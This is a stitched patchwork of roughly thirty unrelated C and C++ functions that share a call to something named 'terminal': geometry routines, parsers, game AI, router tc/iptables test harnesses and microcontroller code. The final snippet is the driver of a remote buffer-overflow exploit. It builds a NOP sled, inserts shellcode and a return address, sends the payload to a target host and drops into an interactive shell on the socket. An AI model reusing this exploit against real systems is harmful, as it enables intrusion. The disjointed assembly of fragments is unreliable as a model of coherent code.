/*! */ double Segment2D::dist( const Vector2D & p ) const { double len = this->length(); if ( len == 0.0 ) { return origin().dist( p ); } const Vector2D vec = terminal() - origin(); const double prod = vec.innerProduct( p - origin() ); // // A: p1 - p0 // A: p - p0 // // check if 0 <= |B|cos(theta) <= |A| // -> 0 <= |A||b|cos(theta) <= |A|^2 // -> 0 <= A.B <= |A|^2 // A.B = |A||B|cos(theta) // if ( 0.0 <= prod && prod <= len * len ) { // return perpendicular distance //return std::fabs( Triangle2D( *this, p ).doubleSignedArea() / len ); return std::fabs( Triangle2D::double_signed_area( origin(), terminal(), p ) / len ); } return std::sqrt( std::min( origin().dist2( p ), terminal().dist2( p ) ) ); }
int parse_properties(t_list **tokens) { t_list *save; save = *tokens; if (terminal(tokens, WORD) == 0) { (*tokens) = save; return (0); } (*tokens) = (*tokens)->next; if (terminal(tokens, COLON) == 0) { (*tokens) = save; return (0); } (*tokens) = (*tokens)->next; if (terminal(tokens, WORD) == 0) { (*tokens) = save; return (0); } (*tokens) = (*tokens)->next; if (terminal(tokens, COMMA)) { (*tokens) = (*tokens)->next; parse_properties(tokens); } return (1); }
/*! */ Vector2D Segment2D::nearestPoint( const Vector2D & p ) const { const Vector2D vec = terminal() - origin(); const double len_square = vec.r2(); if ( len_square == 0.0 ) { return origin(); } double inner_product = vec.innerProduct( (p - origin()) ); // // A: p1 - p0 // B: p - p0 // // check if 0 <= |B|cos(theta) <= |A| // -> 0 <= |A||B|cos(theta) <= |A|^2 // -> 0 <= A.B <= |A|^2 // A.B = |A||B|cos(theta) // if ( inner_product <= 0.0 ) { return origin(); } else if ( inner_product >= len_square ) { return terminal(); } return origin() + vec * inner_product / len_square; }
/*! */ bool Segment2D::existIntersection( const Line2D & l ) const { double a0 = l.a() * origin().x + l.b() * origin().y + l.c(); double a1 = l.a() * terminal().x + l.b() * terminal().y + l.c(); return a0 * a1 <= 0.0; }
void ac::loadKonsole() { KLibFactory* factory = KLibLoader::self()->factory( "libsanekonsolepart" ); if (!factory) factory = KLibLoader::self()->factory( "libkonsolepart" ); konsole = static_cast<KParts::Part*>( factory->create( konsoleFrame, "konsolepart", "QObject", "KParts::ReadOnlyPart" ) ); terminal()->setAutoDestroy( true ); terminal()->setAutoStartShell( false ); konsole->widget()->setGeometry(0, 0, konsoleFrame->width(), konsoleFrame->height()); }
QByteArray Device::netListConnects() { QByteArray connects; for(int i=0; i < numberPorts(); ++i){ if(terminal(i)->isRef()){ connects.append("0"); }else{ connects.append( QByteArray::number(terminal(i)->id()) ); } connects.append(" "); } return connects; }
// private bool Segment2D::checkIntersectsOnLine( const Vector2D & p ) const { if ( origin().x == terminal().x ) { return ( origin().y <= p.y && p.y <= terminal().y ) || ( terminal().y <= p.y && p.y <= origin().y ); } else { return ( origin().x <= p.x && p.x <= terminal().x ) || ( terminal().x <= p.x && p.x <= origin().x ); } }
void node_token (NODE **dest, const char *src, int len, const CTYPE *ctype) { NODE *n = terminal(TYP, src, ctype); (*dest) = n; add_token_queue(src, len); }
//ITE FUNCTION int circuit::ITE(int i, int t, int e){ int terminalResult = 0; //Check if ITE is a terminal node if(terminal(i, t, e, terminalResult)){ return terminalResult; } //Check computed Table to see if ITE is already computed if(iteExists(i,t,e, terminalResult)) return terminalResult; //Get top variable give i t e int top = topVariable(i, t, e); //Recurse ITE through true and false edge int TE = ITE(function(i, top, true), function(t, top, true), function(e, top, true)); int FE = ITE(function(i, top, false), function(t, top, false), function(e, top, false)); //Check if TE and FE are the same. if(TE == FE) return TE; //Add node into table if unique int label = insertUT(top, TE, FE); //Add node to CT; int keys[] = {i, t, e}; std::vector<int> key (keys, keys+sizeof(keys)/sizeof(int)); hashCT[key] = label; return label; }
/*! */ Vector2D Segment2D::projection( const Vector2D & p ) const { Vector2D dir = terminal() - origin(); double len = dir.r(); if ( len < EPSILON ) { return origin(); } dir /= len; // normalize double d = dir.innerProduct( p - origin() ); if ( -EPSILON < d && d < len + EPSILON ) { dir *= d; return Vector2D( origin() ) += dir; } return Vector2D::INVALIDATED; #if 0 Line2D my_line = this->line(); Vector2D sol = my_line.projection( p ); if ( ! sol.isValid() || ! this->contains( sol ) ) { return Vector2D::INVALIDATED; } return sol; #endif }
/*! */ bool Segment2D::onSegmentWeakly( const Vector2D & p ) const { Vector2D proj = projection( p ); return ( proj.isValid() && p.equalsWeakly( proj ) ); #if 0 Vector2D o = origin(); Vector2D t = terminal(); const double buf = ( allow_on_terminal ? EPSILON : 0.0 ); if ( std::fabs( ( t - o ).outerProduct( p - o ) ) < EPSILON ) { if ( std::fabs( o.x - t.x ) < EPSILON ) { return ( ( o.y - buf < p.y && p.y < t.y + buf ) || ( t.y - buf < p.y && p.y < o.y + buf ) ); } else { return ( ( o.x - buf < p.x && p.x < t.x + buf ) || ( t.x - buf < p.x && p.x < o.x + buf) ); } } return false; #endif }
/*! */ bool Segment2D::onSegment( const Vector2D & p ) const { //return Triangle2D( *this, p ).doubleSignedArea() == 0.0 return Triangle2D::double_signed_area( origin(), terminal(), p ) == 0.0 && checkIntersectsOnLine( p ); }
/* Връща 1, ако конфигурацията е печеливша за играча player, 2 — ако е губеща и * 3, ако е неопределена */ char checkPosition(char player, char board[3][3]) { unsigned i, j, result; int t = terminal(board); if (t) { if (player == t) return 1; if (3 == t) return 3; if (player != t) return 2; } else { char otherPlayer, playerSign; if (player == 1) { playerSign = 'X'; otherPlayer = 2; } else { playerSign = 'O'; otherPlayer = 1; } /* char boardi[3][3]; Ј * определя позицията */ for (i = 0; i < 3; i++) { for (j = 0; j < 3; j++) { if (board[i][j] == '.') { board[i][j] = playerSign; result = checkPosition(otherPlayer, board); board[i][j] = '.'; if (result == 2) return 1; /* конфигурацията е губеща за противника, */ /* следователно е печеливша за играча player */ if (result == 3) return 3; /* конфигурацията е неопределена */ } } } /* ако сме достигнали дотук, значи всички наследници са печеливши конфигурации и * следователно тази е губеща за играча player */ return 2; } }
ac::ac(const QString &changes, QWidget *parent, const char *name, const QStringList &) :AcDialog(parent, name) { borderFrame->hide(); setGeometry( x(), y(), 500, 30); borderFrame->setGeometry( 0, 0, 500, 400); konsoleFrame->setGeometry( 0, 0, 500, 400); appdir = "/usr/share/apt-get-konsole/"; loadKonsole(); konsoleFrame->installEventFilter( this ); changes2 = changes; QStrList run; run.append( appdir+"sh/applyChanges" ); run.append( changes ); // run command terminal()->startProgram( appdir+"sh/applyChanges", run ); j=0; firstdownload = TRUE; connect( konsole, SIGNAL( receivedData( const QString& ) ), SLOT( shellOutput( const QString&) ) ); connect( konsole, SIGNAL( destroyed() ), SLOT( close() ) ); }
int main() { srand (time(NULL)); setlocale(LC_ALL,""); //initialize ncurses initscr(); start_color(); init_pair(1, COLOR_GREEN, COLOR_BLACK); keypad(stdscr, TRUE); curs_set(FALSE); noecho(); //timeout(200); //adjust speed of the game int xmax, ymax; getmaxyx(stdscr, ymax, xmax); Board terminal(ymax, xmax); attron(COLOR_PAIR(1)); Gamesession gottacatchemall(terminal, 200); gottacatchemall.playon(terminal); endwin(); return 0; }
/* void test(void) { window win; char name[10]="window"; clearscreen(); win_init(&win,1,1,10,40,name,blightgray|fwhite,blightgray|fblack); win_create(&win); win_putchar(&win,'n'); win_putchar(&win,'\n'); int i; for(i=0;i<7;i++) win_putstring(&win,"testing win_putstring\n");/ for(i=0;i<4;i++)// win_putstring(&win,"new line\n"); } */ int main(struct multiboot *mboot_ptr) { welcome(); init_descriptor_tables(); asm volatile("sti"); init_timer(1); wait(1); win_clear(&win_boot); win_putstring(&win_boot,"\ninitializing timer...\t"); wait(1); win_putstring(&win_boot," done"); win_putstring(&win_boot,"\ninitializing keyboard...\t"); init_kbd(); wait(1); win_putstring(&win_boot," done"); win_putstring(&win_boot,"\npress any key to continue...\n"); u8int s,a; kbd_read(&s,&a); clearscreen(); terminal(); while(1); return 0; }
int main(int argc, char **argv) { printf("Ejercicio TicTacToe.\n"); int jugador; //+1 o -1 int primero,ganador; tNodo *juego = crearNodo(tablero_inicial); dispNodo(juego); printf("El Agente Inteligente juega con X \n El Jugador Humano con O \n Elige el turno 1:Primero o 2:Segundo "); scanf("%d",&primero); printf("\n"); if(primero == 1) jugador = -1; //Turno de Min else jugador = 1; //Turno de Max ganador = terminal(juego,jugador); while(juego->vacias > 0 && ganador == 0) { if(jugador == 1) juego = (tNodo *) PSEUDOminimax(juego); else juego = (tNodo *) jugadaAdversario(juego); dispNodo(juego); ganador = terminal(juego,jugador); jugador = opuesto(jugador);//turno del adversario } switch(ganador) { case 100: printf("\n HE GANADOOOO\n"); break; case 0: printf("\n EMPATE\n"); break; case -100: printf("\n Increible pero has ganado tu :(( \n\n"); break; default: printf("\n algo ha salido mal en el juego ..\n"); } return 0; }
/** * \brief The entry point of the sample */ int main(int argc, char *argv[]) { // Start console application and check arguments ConsoleApplication app(argc, argv); // Enable logging Log::enable(Log::LOG_LEVEL_INFO); // Setup emulator BasicEmulator emulator("", 3201); emulator.setParam("Algorithm", "htb"); emulator.setParam("FairQueue", "on"); emulator.setParam("TxRate", "256kbps"); emulator.setParam("RxRate", "2000kbps"); emulator.commit(); // Setup router SshTerminal terminal("-p voyage ssh [email protected]"); // use sshpass terminal.start(); // Exec tests for (int test_index = 0; test_index < 2; test_index++) { // Setup Router if (test_index == 0) // In test one, fifo queues are applied as the default qdisc { terminal.enter("tc qdisc show\n"); } else // In test two, use htb { terminal.enter("tc qdisc add dev eth1 root handle 1: htb default 40\n"); terminal.enter("tc class add dev eth1 parent 1: classid 1:1 htb rate 1600kbit ceil 1600kbit quantum 1540\n"); terminal.enter("tc class add dev eth1 parent 1:1 classid 1:10 htb rate 400kbit ceil 1600kbit quantum 1540\n"); terminal.enter("tc class add dev eth1 parent 1:1 classid 1:20 htb rate 400kbit ceil 1600kbit quantum 1540\n"); terminal.enter("tc class add dev eth1 parent 1:1 classid 1:30 htb rate 400kbit ceil 1600kbit quantum 1540\n"); terminal.enter("tc class add dev eth1 parent 1:1 classid 1:40 htb rate 400kbit ceil 1600kbit quantum 1540\n"); terminal.enter("tc filter add dev eth1 parent 1: protocol ip prio 1 u32 match ip dst flowid 1:10\n"); terminal.enter("tc filter add dev eth1 parent 1: protocol ip prio 1 u32 match ip dst flowid 1:20\n"); terminal.enter("tc filter add dev eth1 parent 1: protocol ip prio 1 u32 match ip dst flowid 1:30\n"); terminal.enter("tc filter add dev eth1 parent 1: protocol ip prio 1 u32 match ip dst flowid 1:40\n"); } // Execute Test int threads[15] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }; execTest(app, 3, 15, threads, true, true); // Reset router if (test_index == 1) { terminal.enter("tc qdisc del dev eth1 root\n"); } } emulator.reset(); terminal.close(); // Exit return 0; }
void main() { com2 << "at m1 l1 s0=0 s7=90 e1 q0 v1 x4 &c1 &d2\r"; // if (!com2.dtr()) // not really necessary // com2.setDtr(); terminal(); // answer(); // still doesn't work right // com2.dropDtr(); }
/** * \brief The entry point of the sample */ int main(int argc, char *argv[]) { // Start console application and check arguments ConsoleApplication app(argc, argv); // Enable logging Log::enable(Log::LOG_LEVEL_INFO); // Setup emulator BasicEmulator emulator("", 3201); emulator.setParam("Algorithm", "htb"); emulator.setParam("FairQueue", "off"); emulator.setParam("TxRate", "256kbps"); emulator.setParam("RxRate", "2000kbps"); emulator.commit(); // Setup router SshTerminal terminal("-p voyage ssh [email protected]"); // use sshpass terminal.start(); // Exec tests for (int bulkUsers = 1; bulkUsers <= 9; bulkUsers++) { // Setup Router terminal.enter(QString( "tc qdisc add dev eth0 root handle 1: htb default %1\n") .arg((bulkUsers + 1) * 10)); terminal.enter( "tc class add dev eth0 parent 1: classid 1:1 htb rate 240kbit quantum 1540\n"); for (int i = 1; i <= bulkUsers + 1; i++) { terminal.enter(QString( "tc class add dev eth0 parent 1:1 classid 1:%1 htb rate %2kbit ceil 240kbit quantum 1540\n") .arg(i * 10).arg(240 / (bulkUsers + 1))); terminal.enter(QString( "tc filter add dev eth0 parent 1: protocol ip prio 1 handle %1 fw flowid 1:%1\n") .arg(i * 10)); terminal.enter(QString( "iptables -t mangle -A FORWARD -s 172.16.0.%1 -j MARK --set-mark %2\n") .arg(16 + i - 1).arg(i * 10)); } // Execute Test printf("\nTest %d: %d users\n", bulkUsers, bulkUsers); execTest(app, bulkUsers, 64, true, true); // Reset router terminal.enter("tc qdisc del dev eth0 root\n"); terminal.enter("iptables -t mangle -F FORWARD\n"); } emulator.reset(); terminal.close(); // Exit return 0; }
void loop() { delay(2000); enterCmdMode(); delay(250); //enterCmdMode(); //delay(250); //wifi.println(); wifi.println("get mac"); delay(250); readWifi(); delay(250); exitCmdMode(); delay(250); readWifi(); //terminal(); //Serial.print("Ping count = "); //Serial.println(count); //enterCmdMode(); //enterCmdMode(); // for (int i = 0 ; i < 2; i++ ) { // //Ping terminal 20 times // wifi.println("ping"); // delay(500); // wait 500 ms // } //exitCmdMode(); /* if ((millis() - lastSend) > 1000) { count++; Serial.print("Sending message "); Serial.println(count); wifi.print("Hello, count="); wifi.println(count); lastSend = millis(); } */ if (Serial.available()) { /* if the user hits 't', switch to the terminal for debugging */ if (Serial.read() == 't') { terminal(); } } }
int parse_camera(t_list **tokens) { t_list *save; save = *tokens; if (terminal(tokens, WORD) == 0 || ft_strcmp(get_token(tokens)->lexeme, "camera")) { (*tokens) = save; return (0); } (*tokens) = (*tokens)->next; if (terminal(tokens, OPENING_BRACKET) == 0) return (0); (*tokens) = (*tokens)->next; if (parse_properties(tokens) == 0) return (0); if (terminal(tokens, CLOSING_BRACKET) == 0) return (0); (*tokens) = (*tokens)->next; return (1); }
void BasicBlock::replaceTerminal(Node* node) { NodeAndIndex result = findTerminal(); if (!result) append(node); else { m_nodes.insert(result.index + 1, node); result.node->convertToPhantom(); } ASSERT(terminal()); }
bool Sector::Intersects(const Line& line) const { if(this->Intersects(Point(line.GetPointOne()))) return true; if(this->Intersects(Point(line.GetPointTwo()))) return true; Line initial(GetPosition(), GetStartPoint().GetPosition()); Line terminal(GetPosition(), GetEndPoint().GetPosition()); if(initial.Intersects(line)) return true; if(terminal.Intersects(line)) return true; return false; }
int parse_shape(t_list **tokens) { t_list *save; save = *tokens; if (terminal(tokens, WORD) == 0) { (*tokens) = save; return (0); } (*tokens) = (*tokens)->next; if (terminal(tokens, OPENING_BRACKET) == 0) return (0); (*tokens) = (*tokens)->next; if (parse_properties(tokens) == 0) return (0); if (terminal(tokens, CLOSING_BRACKET) == 0) return (0); (*tokens) = (*tokens)->next; return (1); }
/*! */ Vector2D Segment2D::intersection( const Segment2D & other, const bool allow_end_point ) const { Vector2D sol = this->line().intersection( other.line() ); if ( ! sol.isValid() || ! this->contains( sol ) || ! other.contains( sol ) ) { return Vector2D::INVALIDATED; } if ( ! allow_end_point && ! existIntersectionExceptEndpoint( other ) ) { return Vector2D::INVALIDATED; } return sol; #if 0 // Following algorithm seems faster ther above. // In fact, the following algorithm slower... Vector2D ab = terminal() - origin(); Vector2D dc = other.origin() - other.terminal(); Vector2D ad = other.terminal() - origin(); double det = dc.outerProduct( ab ); if ( std::fabs( det ) < 1.0e-9 ) { // area size is 0. // segments has same slope. std::cerr << "Segment2D::intersection()" << " ***ERROR*** parallel segments" << std::endl; return Vector2D::INVALIDATED; } double s = ( dc.x * ad.y - dc.y * ad.x ) / det; double t = ( ab.x * ad.y - ab.y * ad.x ) / det; if ( s < 0.0 || 1.0 < s || t < 0.0 || 1.0 < t ) { return Vector2D::INVALIDATED; } return Vector2D( origin().x + ab.x * s, origin().y + ab.y * s ); #endif }
/*! */ double Segment2D::dist( const Segment2D & seg ) const { if ( this->existIntersection( seg ) ) { return 0.0; } return std::min( std::min( this->dist( seg.origin() ), this->dist( seg.terminal() ) ), std::min( seg.dist( origin() ), seg.dist( terminal() ) ) ); }
boolean connectWifi (SoftwareSerial *wifiSerial, const char *ssid, const char *pass) { if (!wifly.begin(wifiSerial, &Serial)) { Serial.println(F("Could not start Wifly module.")); terminal(); return false; } // Join wifi network if not already associated if (!wifly.isAssociated()) { wifly.setSSID(ssid); wifly.setPassphrase(pass); wifly.enableDHCP(); wifly.setDeviceID("Wifly-WebClient"); if (!wifly.join()) { Serial.println(F("Failed to join wifi network")); terminal(); return false; } } return true; }
/* * Construct the parsing table. The parsing table is logically a 2D * array, indexed by a nonterminal index and a terminal index. * The [N, T] entry contains a rule index (index into grammar[]). * See Wikipedia again. */ static void init_parsing_table(void) { size_t i, j; for (i = 0; i < nonterminals_size; i++) { char A = nonterminal(i); for (j = 0; j < terminals_size; j++) { char a = terminal(j); *next_parsing_table(1) = pt_entry(A, a); } } #if DUMP_TABLES printf("parsing table\n"); printf(" "); for (j = 0; j < TOKEN_TYPE_COUNT; j++) printf("%3c", terminal(j)); printf("\n"); printf(" "); for (j = 0; j < terminals_size; j++) printf("---"); printf("\n"); for (i = 0; i < nonterminals_size; i++) { printf("%3c :", nonterminal(i)); for (j = 0; j < terminals_size; j++) { uint_fast8_t e = parsing_table_entry(i, j); if (e == NO_RULE) printf(" - "); else printf("%3d", e); } printf("\n"); } printf("\n"); #endif }
void main (int argc, char **argv) { int i, rc; char buf[2048]; struct sockaddr_in sin; char *s; int sock; if (argc != 2) { printf("Usage: %s <host[:port]>\n", argv[0]); exit(0); } s = strchr(argv[1], ':'); if (s) { *s=0; port = atoi(s+1); } sin.sin_port = htons(port); sin.sin_addr.s_addr = resolve(argv[1]); sin.sin_family = AF_INET; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket()"); exit(0); } rc = connect(sock, (struct sockaddr *)&sin, sizeof(sin)); if (rc == -1) { perror("connect()"); exit(0); } for (i=0;i<1500;i++) buf[i]=0x90; memcpy(&buf[999-sizeof(overflow)], overflow, sizeof(overflow)); buf[999]=ADDR & 0xFF; buf[1000]=(ADDR >> 8) & 0xFF; buf[1001]=(ADDR >> 16) & 0xFF; buf[1002]=(ADDR >> 24) & 0xFF; buf[1003]='\n'; send(sock, buf, 1003, 0); terminal(sock); exit(0); }